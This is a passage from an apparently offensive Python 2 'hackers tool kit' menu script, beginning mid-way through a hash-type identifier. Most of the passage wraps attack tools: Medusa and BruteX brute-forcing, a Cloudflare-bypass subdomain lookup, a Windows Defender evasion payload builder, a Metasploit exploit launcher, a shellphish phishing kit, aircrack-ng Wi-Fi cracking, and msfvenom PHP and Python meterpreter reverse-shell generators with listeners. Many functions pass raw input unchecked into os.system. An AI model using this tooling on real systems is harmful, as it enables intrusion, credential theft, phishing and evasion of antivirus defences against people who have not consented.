hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106680") + def md5sha1md5pass(): + hs='099b8a59795e07c334a696a10c0ebce0' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106700") + def md5sha1md5sha1pass(): + hs='06e4af76833da7cc138d90602ef80070' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106720") + def md5strtouppermd5pass(): + hs='519de146f1a658ab5e5e2aa9b7d2eec8' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106740") + + def LineageIIC4(): + hs='0x49a57f66bd3d5ba6abda5579c264a0e4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True and hash[0:2].find('0x')==0: + jerar.append("107080") + def MD5phpBB3(): + hs='$H$9kyOtE8CDqMJ44yfn9PFz2E.L2oVzL1' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$H$')==0: + jerar.append("107040") + def MD5Unix(): + hs='$1$cTuJH0Ju$1J8rI.mJReeMvpKUZbSlY/' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$1$')==0: + jerar.append("107060") + def MD5Wordpress(): + hs='$P$BiTOhOj3ukMgCci2juN0HRbCdDRqeh.' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$P$')==0: + jerar.append("107020") + + def MD5APR(): + hs='$apr1$qAUKoKlG$3LuCncByN76eLxZAh/Ldr1' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash[0:4].find('$apr')==0: + jerar.append("108020") + + def Haval160(): + hs='a106e921284dd69dad06192a4411ec32fce83dbb' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109100") + def Haval160HMAC(): + hs='29206f83edc1d6c3f680ff11276ec20642881243' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109200") + def MySQL5(): + hs='9bb2fb57063821c762cc009f7584ddae9da431ff' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109040") + def MySQL160bit(): + hs='*2470c0c06dee42fd1618bb99005adca2ec9d1e19' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:1].find('*')==0: + jerar.append("109060") + def RipeMD160(): + hs='dc65552812c66997ea7320ddfb51f5625d74721b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109120") + def RipeMD160HMAC(): + hs='ca28af47653b4f21e96c1235984cb50229331359' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109180") + def SHA1(): + hs='4a1d4dbc1e193ec3ab2e9213876ceb8f4db72333' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109020") + def SHA1HMAC(): + hs='6f5daac3fee96ba1382a09b1ba326ca73dccf9e7' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109140") + def SHA1MaNGOS(): + hs='a2c0cdb6d1ebd1b9f85c6e25e0f8732e88f02f96' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109220") + def SHA1MaNGOS2(): + hs='644a29679136e09d0bd99dfd9e8c5be84108b5fd' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109240") + def Tiger160(): + hs='c086184486ec6388ff81ec9f235287270429b225' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109080") + def Tiger160HMAC(): + hs='6603161719da5e56e1866e4f61f79496334e6a10' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109160") + def sha1passsalt(): + hs='f006a1863663c21c541c8d600355abfeeaadb5e4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109260") + def sha1saltpass(): + hs='299c3d65a0dcab1fc38421783d64d0ecf4113448' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109280") + def sha1saltmd5pass(): + hs='860465ede0625deebb4fbbedcb0db9dc65faec30' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109300") + def sha1saltmd5passsalt(): + hs='6716d047c98c25a9c2cc54ee6134c73e6315a0ff' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109320") + def sha1saltsha1pass(): + hs='58714327f9407097c64032a2fd5bff3a260cb85f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109340") + def sha1saltsha1saltsha1pass(): + hs='cc600a2903130c945aa178396910135cc7f93c63' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109360") + def sha1usernamepass(): + hs='3de3d8093bf04b8eb5f595bc2da3f37358522c9f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109380") + def sha1usernamepasssalt(): + hs='00025111b3c4d0ac1635558ce2393f77e94770c5' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109400") + def sha1md5pass(): + hs='fa960056c0dea57de94776d3759fb555a15cae87' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("1094202") + def sha1md5passsalt(): + hs='1dad2b71432d83312e61d25aeb627593295bcc9a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109440") + def sha1md5sha1pass(): + hs='8bceaeed74c17571c15cdb9494e992db3c263695' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109460") + def sha1sha1pass(): + hs='3109b810188fcde0900f9907d2ebcaa10277d10e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109480") + def sha1sha1passsalt(): + hs='780d43fa11693b61875321b6b54905ee488d7760' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109500") + def sha1sha1passsubstrpass03(): + hs='5ed6bc680b59c580db4a38df307bd4621759324e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109520") + def sha1sha1saltpass(): + hs='70506bac605485b4143ca114cbd4a3580d76a413' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109540") + def sha1sha1sha1pass(): + hs='3328ee2a3b4bf41805bd6aab8e894a992fa91549' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109560") + def sha1strtolowerusernamepass(): + hs='79f575543061e158c2da3799f999eb7c95261f07' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109580") + + def Haval192(): + hs='cd3a90a3bebd3fa6b6797eba5dab8441f16a7dfa96c6e641' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110040") + def Haval192HMAC(): + hs='39b4d8ecf70534e2fd86bb04a877d01dbf9387e640366029' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110080") + def Tiger192(): + hs='c086184486ec6388ff81ec9f235287270429b2253b248a70' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110020") + def Tiger192HMAC(): + hs='8e914bb64353d4d29ab680e693272d0bd38023afa3943a41' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110060") + + def MD5passsaltjoomla1(): + hs='35d1c0d69a2df62be2df13b087343dc9:BeKMviAfcXeTPTlX' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: + jerar.append("112020") + + def SHA1Django(): + hs='sha1$Zion3R$299c3d65a0dcab1fc38421783d64d0ecf4113448' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:5].find('sha1$')==0: + jerar.append("113020") + + def Haval224(): + hs='f65d3c0ef6c56f4c74ea884815414c24dbf0195635b550f47eac651a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114040") + def Haval224HMAC(): + hs='f10de2518a9f7aed5cf09b455112114d18487f0c894e349c3c76a681' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114080") + def SHA224(): + hs='e301f414993d5ec2bd1d780688d37fe41512f8b57f6923d054ef8e59' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114020") + def SHA224HMAC(): + hs='c15ff86a859892b5e95cdfd50af17d05268824a6c9caaa54e4bf1514' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114060") + + def SHA256(): + hs='2c740d20dab7f14ec30510a11f8fd78b82bc3a711abe8a993acdb323e78e6d5e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115020") + def SHA256HMAC(): + hs='d3dd251b7668b8b6c12e639c681e88f2c9b81105ef41caccb25fcde7673a1132' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115120") + def Haval256(): + hs='7169ecae19a5cd729f6e9574228b8b3c91699175324e6222dec569d4281d4a4a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115040") + def Haval256HMAC(): + hs='6aa856a2cfd349fb4ee781749d2d92a1ba2d38866e337a4a1db907654d4d4d7a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115140") + def GOSTR341194(): + hs='ab709d384cce5fda0793becd3da0cb6a926c86a8f3460efb471adddee1c63793' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115060") + def RipeMD256(): + hs='5fcbe06df20ce8ee16e92542e591bdea706fbdc2442aecbf42c223f4461a12af' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115080") + def RipeMD256HMAC(): + hs='43227322be1b8d743e004c628e0042184f1288f27c13155412f08beeee0e54bf' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115160") + def SNEFRU256(): + hs='3a654de48e8d6b669258b2d33fe6fb179356083eed6ff67e27c5ebfa4d9732bb' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115100") + def SNEFRU256HMAC(): + hs='4e9418436e301a488f675c9508a2d518d8f8f99e966136f2dd7e308b194d74f9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115180") + def SHA256md5pass(): + hs='b419557099cfa18a86d1d693e2b3b3e979e7a5aba361d9c4ec585a1a70c7bde4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115200") + def SHA256sha1pass(): + hs='afbed6e0c79338dbfe0000efe6b8e74e3b7121fe73c383ae22f5b505cb39c886' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115220") + + def MD5passsaltjoomla2(): + hs='fb33e01e4f8787dc8beb93dac4107209:fxJUXVjYRafVauT77Cze8XwFrWaeAYB2' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: + jerar.append("116020") + def SAM(): + hs='4318B176C3D8E3DEAAD3B435B51404EE:B7C899154197E8A2A33121D76A240AB5' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash.islower()==False and hash[32:33].find(':')==0: + jerar.append("116040") + + def SHA256Django(): + hs='sha256$Zion3R$9e1a08aa28a22dfff722fad7517bae68a55444bb5e2f909d340767cec9acf2c3' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha256')==0: + jerar.append("117020") + + def RipeMD320(): + hs='b4f7c8993a389eac4f421b9b3b2bfb3a241d05949324a8dab1286069a18de69aaf5ecc3c2009d8ef' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("118020") + def RipeMD320HMAC(): + hs='244516688f8ad7dd625836c0d0bfc3a888854f7c0161f01de81351f61e98807dcd55b39ffe5d7a78' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("118040") + + def SHA384(): + hs='3b21c44f8d830fa55ee9328a7713c6aad548fe6d7a4a438723a0da67c48c485220081a2fbc3e8c17fd9bd65f8d4b4e6b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("119020") + def SHA384HMAC(): + hs='bef0dd791e814d28b4115eb6924a10beb53da47d463171fe8e63f68207521a4171219bb91d0580bca37b0f96fddeeb8b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("119040") + + def SHA256s(): + hs='$6$g4TpUQzk$OmsZBJFwvy6MwZckPvVYfDnwsgktm2CckOlNJGy9HNwHSuHFvywGIuwkJ6Bjn3kKbB6zoyEjIYNMpHWBNxJ6g.' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$6$')==0: + jerar.append("120020") + + def SHA384Django(): + hs='sha384$Zion3R$88cfd5bc332a4af9f09aa33a1593f24eddc01de00b84395765193c3887f4deac46dc723ac14ddeb4d3a9b958816b7bba' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha384')==0: + print " [+] SHA-384(Django)" + jerar.append("121020") + + def SHA512(): + hs='ea8e6f0935b34e2e6573b89c0856c81b831ef2cadfdee9f44eb9aa0955155ba5e8dd97f85c73f030666846773c91404fb0e12fb38936c56f8cf38a33ac89a24e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122020") + def SHA512HMAC(): + hs='dd0ada8693250b31d9f44f3ec2d4a106003a6ce67eaa92e384b356d1b4ef6d66a818d47c1f3a2c6e8a9a9b9bdbd28d485e06161ccd0f528c8bbb5541c3fef36f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122060") + def Whirlpool(): + hs='76df96157e632410998ad7f823d82930f79a96578acc8ac5ce1bfc34346cf64b4610aefa8a549da3f0c1da36dad314927cebf8ca6f3fcd0649d363c5a370dddb' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122040") + def WhirlpoolHMAC(): + hs='77996016cf6111e97d6ad31484bab1bf7de7b7ee64aebbc243e650a75a2f9256cef104e504d3cf29405888fca5a231fcac85d36cd614b1d52fce850b53ddf7f9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122080") + + + print logo + while True: + jerar=[] + print """ + -------------------------------------------------------------------------""" + hash = raw_input(" HASH: ") + ADLER32(); CRC16(); CRC16CCITT(); CRC32(); CRC32B(); DESUnix(); DomainCachedCredentials(); FCS16(); GHash323(); GHash325(); GOSTR341194(); Haval128(); Haval128HMAC(); Haval160(); Haval160HMAC(); Haval192(); Haval192HMAC(); Haval224(); Haval224HMAC(); Haval256(); Haval256HMAC(); LineageIIC4(); MD2(); MD2HMAC(); MD4(); MD4HMAC(); MD5(); MD5APR(); MD5HMAC(); MD5HMACWordpress(); MD5phpBB3(); MD5Unix(); MD5Wordpress(); MD5Half(); MD5Middle(); MD5passsaltjoomla1(); MD5passsaltjoomla2(); MySQL(); MySQL5(); MySQL160bit(); NTLM(); RAdminv2x(); RipeMD128(); RipeMD128HMAC(); RipeMD160(); RipeMD160HMAC(); RipeMD256(); RipeMD256HMAC(); RipeMD320(); RipeMD320HMAC(); SAM(); SHA1(); SHA1Django(); SHA1HMAC(); SHA1MaNGOS(); SHA1MaNGOS2(); SHA224(); SHA224HMAC(); SHA256(); SHA256s(); SHA256Django(); SHA256HMAC(); SHA256md5pass(); SHA256sha1pass(); SHA384(); SHA384Django(); SHA384HMAC(); SHA512(); SHA512HMAC(); SNEFRU128(); SNEFRU128HMAC(); SNEFRU256(); SNEFRU256HMAC(); Tiger128(); Tiger128HMAC(); Tiger160(); Tiger160HMAC(); Tiger192(); Tiger192HMAC(); Whirlpool(); WhirlpoolHMAC(); XOR32(); md5passsalt(); md5saltmd5pass(); md5saltpass(); md5saltpasssalt(); md5saltpassusername(); md5saltmd5pass(); md5saltmd5passsalt(); md5saltmd5passsalt(); md5saltmd5saltpass(); md5saltmd5md5passsalt(); md5username0pass(); md5usernameLFpass(); md5usernamemd5passsalt(); md5md5pass(); md5md5passsalt(); md5md5passmd5salt(); md5md5saltpass(); md5md5saltmd5pass(); md5md5usernamepasssalt(); md5md5md5pass(); md5md5md5md5pass(); md5md5md5md5md5pass(); md5sha1pass(); md5sha1md5pass(); md5sha1md5sha1pass(); md5strtouppermd5pass(); sha1passsalt(); sha1saltpass(); sha1saltmd5pass(); sha1saltmd5passsalt(); sha1saltsha1pass(); sha1saltsha1saltsha1pass(); sha1usernamepass(); sha1usernamepasssalt(); sha1md5pass(); sha1md5passsalt(); sha1md5sha1pass(); sha1sha1pass(); sha1sha1passsalt(); sha1sha1passsubstrpass03(); sha1sha1saltpass(); sha1sha1sha1pass(); sha1strtolowerusernamepass() + + if len(jerar)==0: + print "" + print " Not Found." + elif len(jerar)>2: + jerar.sort() + print "" + print "Possible Hashs:" + print "[+] ",algorithms[jerar[0]] + print "[+] ",algorithms[jerar[1]] + print "" + print "Least Possible Hashs:" + for a in range(int(len(jerar))-2): + print "[+] ",algorithms[jerar[a+2]] + else: + jerar.sort() + print "" + print "Possible Hashs:" + for a in range(len(jerar)): + print "[+] ",algorithms[jerar[a]] +#------------------# +#FIND HASH TYPE END# + + +#RESTART SCRIPT START# +#--------------------# +def restart(): + os.system("clear") + os.system("cd /root/hackers-tool-kit && python htk.py") +#------------------# +#RESTART SCRIPT END# + + +#MEDUSA AUTOMATED START# +#----------------------# +def medusa(): + k = raw_input("Target Host: ") + u = raw_input("User: ") + p = raw_input("Wordlist: ") + os.system("cat /root/hackers-tool-kit/tools/medusamods.txt") + print "\n" + m = raw_input("Module: ") + n = raw_input("Port: ") + a = 'medusa -h {0} -u {1} -P {2} -M {3} -n {4}'.format(k,u,p,m,n) + os.system(a) +#--------------------# +#MEDUSA AUTOMATED END# + + +#WAF DETECTER START# +#------------------# +def wafwoof(): + j = raw_input("Enter Target: ") + k = 'wafw00f {0}'.format(j) + os.system(k) +#----------------# +#WAF DETECTER END# + + +#CLOUDFLARE BYPASS START# +#-----------------------# +def cloud(): + + subdomainlist = ["ftp", "cpanel", "webmail" , "mail" , "www", "www1", "www2", "www3", "www4", "www5","ns1", "ns2" , "forums" , "blog"] + + print ('\033[1m' + "CLOUDFLARE BYPASS SCRIPT ") + + host = raw_input("Enter Target: ") + for sublist in subdomainlist: + try: + hosts = str(sublist) + "." + str(host) + showip = socket.gethostbyname(str(hosts)) + print " Cloudflare has begun to be bypassed "+str(showip)+' :| '+str(hosts) + except: + pass + + print ( '\033[93m' + "Credit Goes To: tugrulbey.com") + print ( '\033[92m' + "Credit Goes To: tztugrulbey@protonmail.com") +#---------------------# +#CLOUDFLARE BYPASS END# + + +#BRUTEFORCE ALL SERVICES ON WEB START# +#------------------------------------# +def brutex(): + k = raw_input("Target: ") + p = raw_input("Port: ") + a = 'brutex {0} {1}'.format(k,p) + os.system(a) +#----------------------------------# +#BRUTEFORCE ALL SERVICES ON WEB END# + + +#METERPRETER HELP MENU START# +#---------------------------# +def methelp(): + os.system("cat /root/hackers-tool-kit/tools/meterpreter.txt") +#-------------------------# +#METERPRETER HELP MENU END# + + +#WINDOWS DEFENDER BYPASS START# +#-----------------------------# +def winbyp(): + os.system("cat /root/hackers-tool-kit/tools/payloads.txt") + pay = raw_input("Payload: ") + port = raw_input("Port: ") + name = raw_input("File Name: ") + os.system('echo "use evasion/windows/windows_defender_exe\n" > winbyp.rc') + os.system('echo "set payload {0}\n" >> winbyp.rc'.format(pay)) + os.system('echo "set LHOST 127.0.0.1\n" >> winbyp.rc') + os.system('echo "set LPORT {0}\n" >> winbyp.rc'.format(port)) + os.system('echo "set filename {0}.exe\n" >> winbyp.rc'.format(name)) + os.system('echo "run\n" >> winbyp.rc') + os.system("service postgresql restart") + os.system('msfconsole -r winbyp.rc') + os.system('rm -rf winbyp.rc') +#---------------------------# +#WINDOWS DEFENDER BYPASS END# + + +#USE A EXPLOIT START# +#-------------------# +def exploit(): + os.system("cat /root/hackers-tool-kit/tools/exploits.txt") + print "\n" + f = raw_input("Select Exploit: ") + os.system('echo "use {0}\n" >> exploit.rc'.format(f)) + os.system('echo "show options\n" >> exploit.rc'.format(f)) + os.system("service postgresql restart") + os.system('msfconsole -r exploit.rc') + os.system('rm -rf exploit.rc') +#-----------------# +#USE A EXPLOIT END# + + +#PHISHING AUTOMATED START# +#------------------------# +def phish(): + os.system("bash /root/shellphish/shellphish.sh") +#----------------------# +#PHISHING AUTOMATED END# + + +#LIST DATABASE INFO START# +#------------------------# +def datalist(): + os.system('echo "hosts\n" >> data.rc') + os.system('echo "services\n" >> data.rc') + os.system("service postgresql restart") + os.system('msfconsole -r data.rc') + os.system('rm -rf data.rc') +#----------------------# +#LIST DATABASE INFO END# + + +#ALL METASPLOIT EVASIONS START# +#-----------------------------# +def msfev(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show evasion'""") +#---------------------------# +#ALL METASPLOIT EVASIONS END# + + +#FULLY UPDATE YOUR OS START# +#--------------------------# +def upgrade(): + os.system("apt update && apt upgrade") +#------------------------# +#FULLY UPDATE YOUR OS END# + + +#USE A NMAP SCRIPT START# +#-----------------------# +def nscript(): + os.system("cat /root/hackers-tool-kit/tools/scripts.txt") + print "\n" + j = raw_input(G+"Select Script:\033[0m ") + k = raw_input(G+"Target:\033[0m ") + a = 'nmap --script {0} {1}'.format(j,k) + os.system(a) +#---------------------# +#USE A NMAP SCRIPT END# + + +#GET HOST SSH VERSION START# +#--------------------------# +def sshver(): + f = raw_input(G+"Target: \033[0m") + g = raw_input(G+"Port: \033[0m") + t = raw_input(G+"Threads: \033[0m") + b = raw_input(G+"Timeout: \033[0m") + os.system('echo "use auxiliary/scanner/ssh/ssh_version\n" >> sshver.rc') + os.system('echo "set RHOSTS {0}\n" >> sshver.rc'.format(f)) + os.system('echo "set RPORT {0}\n" >> sshver.rc'.format(g)) + os.system('echo "set THREADS {0}\n" >> sshver.rc'.format(t)) + os.system('echo "set TIMEOUT {0}\n" >> sshver.rc'.format(b)) + os.system('echo "show options\n" >> sshver.rc') + os.system('echo "run\n" >> sshver.rc') + os.system("service postgresql restart") + os.system('msfconsole -r sshver.rc') + os.system('rm -rf sshver.rc') +#------------------------# +#GET HOST SSH VERSION END# + + +#USE PROXYCHAINS FOR WEB START# +#-----------------------------# +def chains(): + h = raw_input("Enter Browser: ") + j = raw_input("Enter Website: ") + a = 'proxychains {0} {1}'.format(h,j) + os.system(a) +#---------------------------# +#USE PROXYCHAINS FOR WEB END# + + +#GET HOST MYSQL VERSION START# +#----------------------------# +def mysqlv(): + f = raw_input(G+"Target: \033[0m") + g = raw_input(G+"Port: \033[0m") + t = raw_input(G+"Threads: \033[0m") + os.system('echo "use auxiliary/scanner/mysql/mysql_version\n" >> mysqlv.rc') + os.system('echo "set RHOSTS {0}\n" >> mysqlv.rc'.format(f)) + os.system('echo "set RPORT {0}\n" >> mysqlv.rc'.format(g)) + os.system('echo "set THREADS {0}\n" >> mysqlv.rc'.format(t)) + os.system('echo "show options\n" >> mysqlv.rc') + os.system('echo "run\n" >> mysqlv.rc') + os.system("service postgresql restart") + os.system('msfconsole -r mysqlv.rc') + os.system('rm -rf mysqlv.rc') +#--------------------------# +#GET HOST MYSQL VERSION END# + + +#CONNECT TO A HOST START# +#-----------------------# +def connect(): + h = raw_input("Enter Host: ") + print "\n" + print " How would you like to connect?" + print "---------------------------------------" + print "ssh: Secure Shell | Default Port = 22" + print "---------------------------------------" + print "telnet: Network Virtual Terminal | Default Port = 23" + print "---------------------------------------" + j = raw_input("Select Protocol: ") + a = '{0} {1}'.format(j,h) + os.system(a) +#---------------------# +#CONNECT TO A HOST END# + + + +#OPEN NEW TERMINAL START# +#-----------------------# +def terminal(): + os.system("gnome-terminal") +#---------------------# +#OPEN NEW TERMINAL END# + + +#AIRCRACK-NG [WIFI HACK] AUTOMATED START# +#---------------------------------------# +def aircrack(): + b = raw_input(G+"BSSID: \033[0m") + e = raw_input(G+"ESSID: \033[0m") + w = raw_input(G+"Wordlist: \033[0m") + h = raw_input(G+"Handshake file: \033[0m") + os.system("iwconfig") + i = raw_input(G+"Interface: \033[0m") + a = 'aircrack-ng -b {0} -e {1} -w {2} {3} {4}' + os.system(a) +#-------------------------------------# +#AIRCRACK-NG [WIFI HACK] AUTOMATED END# + + +#GET SOURCE CODE OF WEB START# +#----------------------------# +def source(): + t = raw_input(B+"Target:\033[0m ") + print Y+"\nWould you like to save source code in a file?\n\033[0m" + q = raw_input(R+"[y/n]:\033[0m ") + if q == "n": + an = 'curl {0}'.format(t) + os.system(an) + if q == "y": + ay = 'curl {0} >> /root/{1}.txt'.format(t,t) + os.system(ay) + print Y+"\nfile saved > /root/{0}.txt\033[0m".format(t) +#--------------------------# +#GET SOURCE CODE OF WEB END# + + +#WEB DIRECTORY SCAN START# +#------------------------# +def dirscan(): + t = raw_input(B+"Target URL:\033[91m ") + print "\033[0m" + a = 'dirb {0}'.format(t) + os.system(a) +#----------------------# +#WEB DIRECTORY SCAN END# + + + +#APACHE SERVER START# +#-------------------# +def aserver(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + print Y+"Starting Server\033[0m..." + os.system("service apache2 start") + br = raw_input(G+"Browser: \033[0m") + a = '{0} {1}'.format(br,ipaddr) + os.system(a) + stop = raw_input("hit enter to stop server: ") + print Y+"Stopping Server\033[0m..." + os.system("service apache2 stop") +#-----------------# +#APACHE SERVER END# + + +#RUN A FILE START# +#----------------# +def run(): + print Y+"what program do you want to run the file with Example: python" + p = raw_input(N+"Program: ") + print "\n" + print Y+"Example 1: /root/hi/hello.py/ \033[94mExample 2: hello.py\033[0m" + print "\n" + f = raw_input("Enter File: ") + print "\n" + print Y+"would you like to add arguments when running the file [y/n]\033[0m" + yn = raw_input(G+"[y or n]: \033[0m") + if yn == "n" : + a = '{0} {1}'.format(p,f) + os.system(a) + if yn == "y" : + arg = raw_input("Enter Arguments: ") + a = '{0} {1} {2}'.format(p,f,arg) + os.system(a) +#--------------# +#RUN A FILE END# + + +#REFRESH BANNER START# +#--------------------# +def banner(): + os.system("clear") + mainbanner() +#------------------# +#REFRESH BANNER END# + + +#PHP PAYLOAD START# +#-----------------# +def phpload(): + lhost = raw_input("LHOST: ") + lport = raw_input("LPORT: ") + filen = raw_input("File Name: ") + a = 'msfvenom -p php/meterpreter/reverse_tcp LHOST={0} LPORT={1} -o /root/{2}.php'.format(lhost,lport,filen) + os.system(a) + print "\nwould you like to run this file in a multi handler?" + yn = raw_input("[y/n]> ") + if yn == "y": + os.system('echo "use exploit/multi/handler\n" >> phpload.rc') + os.system('echo "set payload php/meterpreter/reverse_tcp\n" >> phpload.rc') + os.system('echo "set LHOST {0}\n" >> phpload.rc'.format(lhost)) + os.system('echo "set LPORT {0}\n" >> phpload.rc'.format(lport)) + os.system('echo "exploit\n" >> phpload.rc') + os.system("service postgresql restart") + os.system('msfconsole -r phpload.rc') + os.system('rm -rf phpload.rc') + if yn == "n": + os.system('echo " "') +#---------------# +#PHP PAYLOAD END# + + +#PYLOAD START# +#------------# +def pyload(): + lhost = raw_input("LHOST: ") + lport = raw_input("LPORT: ") + filen = raw_input("File Name: ") + a = 'msfvenom -p python/meterpreter/reverse_tcp LHOST={0} LPORT={1} -o /root/{2}.py'.format(lhost,lport,filen) + os.system(a) + print "\nwould you like to run this file in a multi handler?" + yn = raw_input("[y/n]> ") + if yn == "y": + os.system('echo "use exploit/multi/handler\n" >> pyload.rc') + os.system('echo "set payload python/meterpreter/reverse_tcp\n" >> pyload.rc') + os.system('echo "set LHOST {0}\n" >> pyload.rc'.format(lhost)) + os.system('echo "set LPORT {0}\n" >> 